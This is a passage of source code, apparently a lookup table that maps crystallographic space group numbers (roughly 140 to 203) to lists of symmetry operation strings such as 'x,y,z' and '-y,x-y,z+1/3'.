'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
140: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
141: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+1/4,x+3/4,z+1/4', 'y+1/4,-x+1/4,z+3/4', '-x+1/2,y,-z+1/2', 'x,-y,-z',
'y+1/4,x+3/4,-z+1/4', '-y+1/4,-x+1/4,-z+3/4', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'y+3/4,-x+1/4,-z+3/4',
'-y+3/4,x+3/4,-z+1/4', 'x+1/2,-y,z+1/2', '-x,y,z', '-y+3/4,-x+1/4,z+3/4', 'y+3/4,x+3/4,z+1/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+3/4,x+1/4,z+3/4', 'y+3/4,-x+3/4,z+1/4', '-x,y+1/2,-z',
'x+1/2,-y+1/2,-z+1/2', 'y+3/4,x+1/4,-z+3/4', '-y+3/4,-x+3/4,-z+1/4', '-x+1/2,-y+1/2,-z+1/2',
'x,y+1/2,-z', 'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4', 'x,-y+1/2,z', '-x+1/2,y+1/2,z+1/2',
'-y+1/4,-x+3/4,z+1/4', 'y+1/4,x+1/4,z+3/4'],
142: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+1/4,x+3/4,z+1/4', 'y+1/4,-x+1/4,z+3/4', '-x+1/2,y,-z', 'x,-y,-z+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'y+3/4,-x+1/4,-z+3/4',
'-y+3/4,x+3/4,-z+1/4', 'x+1/2,-y,z', '-x,y,z+1/2', '-y+3/4,-x+1/4,z+1/4', 'y+3/4,x+3/4,z+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+3/4,x+1/4,z+3/4', 'y+3/4,-x+3/4,z+1/4', '-x,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z', 'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', '-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z',
'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-y+1/4,-x+3/4,z+3/4',
'y+1/4,x+1/4,z+1/4'],
143: ['x,y,z', '-y,x-y,z', '-x+y,-x,z'],
144: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3'],
145: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3'],
146: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x+2/3,y+1/3,z+1/3', '-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3',
'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3'],
147: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z'],
148: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3',
'x-y+2/3,x+1/3,-z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3'],
149: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
150: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z'],
151: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-y,-x,-z+2/3', '-x+y,y,-z+1/3', 'x,x-y,-z'],
152: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', 'y,x,-z', 'x-y,-y,-z+2/3', '-x,-x+y,-z+1/3'],
153: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-y,-x,-z+1/3', '-x+y,y,-z+2/3', 'x,x-y,-z'],
154: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', 'y,x,-z', 'x-y,-y,-z+1/3', '-x,-x+y,-z+2/3'],
155: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+1/3', 'x-y+2/3,-y+1/3,-z+1/3',
'-x+2/3,-x+y+1/3,-z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'y+1/3,x+2/3,-z+2/3', 'x-y+1/3,-y+2/3,-z+2/3', '-x+1/3,-x+y+2/3,-z+2/3'],
156: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z'],
157: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
158: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2'],
159: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
160: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-y+2/3,-x+1/3,z+1/3', '-x+y+2/3,y+1/3,z+1/3',
'x+2/3,x-y+1/3,z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-y+1/3,-x+2/3,z+2/3', '-x+y+1/3,y+2/3,z+2/3', 'x+1/3,x-y+2/3,z+2/3'],
161: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-y+2/3,-x+1/3,z+5/6', '-x+y+2/3,y+1/3,z+5/6',
'x+2/3,x-y+1/3,z+5/6', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-y+1/3,-x+2/3,z+1/6', '-x+y+1/3,y+2/3,z+1/6', 'x+1/3,x-y+2/3,z+1/6'],
162: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
163: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
164: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z'],
165: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2'],
166: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'x+2/3,y+1/3,z+1/3', '-y+2/3,x-y+1/3,z+1/3',
'-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+1/3', 'x-y+2/3,-y+1/3,-z+1/3', '-x+2/3,-x+y+1/3,-z+1/3',
'-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3', 'x-y+2/3,x+1/3,-z+1/3', '-y+2/3,-x+1/3,z+1/3',
'-x+y+2/3,y+1/3,z+1/3', 'x+2/3,x-y+1/3,z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3',
'-x+y+1/3,-x+2/3,z+2/3', 'y+1/3,x+2/3,-z+2/3', 'x-y+1/3,-y+2/3,-z+2/3', '-x+1/3,-x+y+2/3,-z+2/3',
'-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3', '-y+1/3,-x+2/3,z+2/3',
'-x+y+1/3,y+2/3,z+2/3', 'x+1/3,x-y+2/3,z+2/3'],
167: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+5/6', 'x-y+2/3,-y+1/3,-z+5/6',
'-x+2/3,-x+y+1/3,-z+5/6', '-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3', 'x-y+2/3,x+1/3,-z+1/3',
'-y+2/3,-x+1/3,z+5/6', '-x+y+2/3,y+1/3,z+5/6', 'x+2/3,x-y+1/3,z+5/6', 'x+1/3,y+2/3,z+2/3',
'-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3', 'y+1/3,x+2/3,-z+1/6', 'x-y+1/3,-y+2/3,-z+1/6',
'-x+1/3,-x+y+2/3,-z+1/6', '-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3',
'-y+1/3,-x+2/3,z+1/6', '-x+y+1/3,y+2/3,z+1/6', 'x+1/3,x-y+2/3,z+1/6'],
168: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z'],
169: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z+1/2', 'y,-x+y,z+5/6', 'x-y,x,z+1/6'],
170: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z+1/2', 'y,-x+y,z+1/6', 'x-y,x,z+5/6'],
171: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z', 'y,-x+y,z+2/3', 'x-y,x,z+1/3'],
172: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z', 'y,-x+y,z+1/3', 'x-y,x,z+2/3'],
173: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2'],
174: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z'],
175: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z'],
176: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2'],
177: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
178: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z+1/2', 'y,-x+y,z+5/6', 'x-y,x,z+1/6', 'y,x,-z+1/3',
'x-y,-y,-z', '-x,-x+y,-z+2/3', '-y,-x,-z+5/6', '-x+y,y,-z+1/2', 'x,x-y,-z+1/6'],
179: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z+1/2', 'y,-x+y,z+1/6', 'x-y,x,z+5/6', 'y,x,-z+2/3',
'x-y,-y,-z', '-x,-x+y,-z+1/3', '-y,-x,-z+1/6', '-x+y,y,-z+1/2', 'x,x-y,-z+5/6'],
180: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z', 'y,-x+y,z+2/3', 'x-y,x,z+1/3', 'y,x,-z+2/3',
'x-y,-y,-z', '-x,-x+y,-z+1/3', '-y,-x,-z+2/3', '-x+y,y,-z', 'x,x-y,-z+1/3'],
181: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z', 'y,-x+y,z+1/3', 'x-y,x,z+2/3', 'y,x,-z+1/3',
'x-y,-y,-z', '-x,-x+y,-z+2/3', '-y,-x,-z+1/3', '-x+y,y,-z', 'x,x-y,-z+2/3'],
182: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2'],
183: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z',
'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
184: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2',
'x,x-y,z+1/2', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
185: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-y,-x,z+1/2',
'-x+y,y,z+1/2', 'x,x-y,z+1/2', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
186: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-y,-x,z', '-x+y,y,z',
'x,x-y,z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
187: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
188: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z+1/2',
'-x+y,y,z+1/2', 'x,x-y,z+1/2', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
189: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
190: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
191: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z', 'x,y,-z', '-y,x-y,-z',
'-x+y,-x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
192: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2',
'-x,-x+y,-z+1/2', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'y,x,z+1/2',
'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
193: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z+1/2',
'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z+1/2', '-x+y,y,z+1/2',
'x,x-y,z+1/2', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
194: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'y,x,z+1/2',
'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
195: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x'],
196: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2',
'-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2',
'-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2',
'-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x'],
197: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2', '-z+1/2,-x+1/2,y+1/2',
'-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x+1/2',
'-y+1/2,-z+1/2,x+1/2'],
198: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2'],
199: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x'],
200: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x'],
201: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x'],
202: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', '-x,-y+1/2,-z+1/2',
'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2',
'z,x+1/2,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2',
'y,z+1/2,-x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2',
'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2', '-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2',
'z+1/2,-x,y+1/2', '-y+1/2,-z,-x+1/2', 'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y', 'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y',
'-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x', 'y+1/2,z+1/2,-x'],
203: ['x,y,z', '-x+3/4,-y+3/4,z', '-x+3/4,y,-z+3/4', 'x,-y+3/4,-z+3/4', 'z,x,y', 'z,-x+3/4,-y+3/4',
'-z+3/4,-x+3/4,y', '-z+3/4,x,-y+3/4', 'y,z,x', '-y+3/4,z,-x+3/4', 'y,-z+3/4,-x+3/4', '-y+3/4,-z+3/4,x',
'-x,-y,-z', 'x+1/4,y+1/4,-z', 'x+1/4,-y,z+1/4', '-x,y+1/4,z+1/4', '-z,-x,-y', '-z,x+1/4,y+1/4',
'z+1/4,x+1/4,-y', 'z+1/4,-x,y+1/4', '-y,-z,-x', 'y+1/4,-z,x+1/4', '-y,z+1/4,x+1/4', 'y+1/4,z+1/4,-x',
'x,y+1/2,z+1/2', '-x+3/4,-y+1/4,z+1/2', '-x+3/4,y+1/2,-z+1/4', 'x,-y+1/4,-z+1/4', 'z,x+1/2,y+1/2',
'z,-x+1/4,-y+1/4', '-z+3/4,-x+1/4,y+1/2', '-z+3/4,x+1/2,-y+1/4', 'y,z+1/2,x+1/2', '-y+3/4,z+1/2,-x+1/4',
'y,-z+1/4,-x+1/4', '-y+3/4,-z+1/4,x+1/2', '-x,-y+1/2,-z+1/2', 'x+1/4,y+3/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4',
'-x,y+3/4,z+3/4', '-z,-x+1/2,-y+1/2', '-z,x+3/4,y+3/4', 'z+1/4,x+3/4,-y+1/2', 'z+1/4,-x+1/2,y+3/4',
'-y,-z+1/2,-x+1/2', 'y+1/4,-z+1/2,x+3/4', '-y,z+3/4,x+3/4', 'y+1/4,z+3/4,-x+1/2', 'x+1/2,y,z+1/2',
'-x+1/4,-y+3/4,z+1/2', '-x+1/4,y,-z+1/4', 'x+1/2,-y+3/4,-z+1/4', 'z+1/2,x,y+1/2', 'z+1/2,-x+3/4,-y+1/4',
'-z+1/4,-x+3/4,y+1/2', '-z+1/4,x,-y+1/4', 'y+1/2,z,x+1/2', '-y+1/4,z,-x+1/4', 'y+1/2,-z+3/4,-x+1/4',
'-y+1/4,-z+3/4,x+1/2', '-x+1/2,-y,-z+1/2', 'x+3/4,y+1/4,-z+1/2', 'x+3/4,-y,z+3/4', '-x+1/2,y+1/4,z+3/4',
